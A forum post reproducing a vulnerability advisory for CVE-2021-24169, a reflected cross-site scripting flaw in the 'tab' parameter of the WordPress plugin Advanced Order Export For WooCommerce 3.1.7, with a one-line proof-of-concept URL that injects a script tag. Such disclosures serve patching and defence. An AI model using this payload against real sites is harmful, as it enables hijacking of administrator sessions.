WordPress Advanced Order Export For WooCommerce 3.1.7 Cross Site Scripting

#349
Topic created · 1 Posts · 1 Views
  • # Exploit Title: WordPress Plugin Advanced Order Export For WooCommerce 3.1.7 - Reflected Cross-Site Scripting (XSS)
    # Date: 15/2/2021
    # Author: 0xB9
    # Software Link: https://wordpress.org/plugins/woo-order-export-lite/
    # Version: 3.1.7
    # Tested on: Windows 10
    # CVE: CVE-2021-24169
    
    1. Description:
    This plugin helps you to easily export WooCommerce order data. The tab parameter in the Admin Panel is vulnerable to XSS.
    
    2. Proof of Concept:
    wp-admin/admin.php?page=wc-order-export&tab=</script><script>alert(1)</script>
    
    
Log in to reply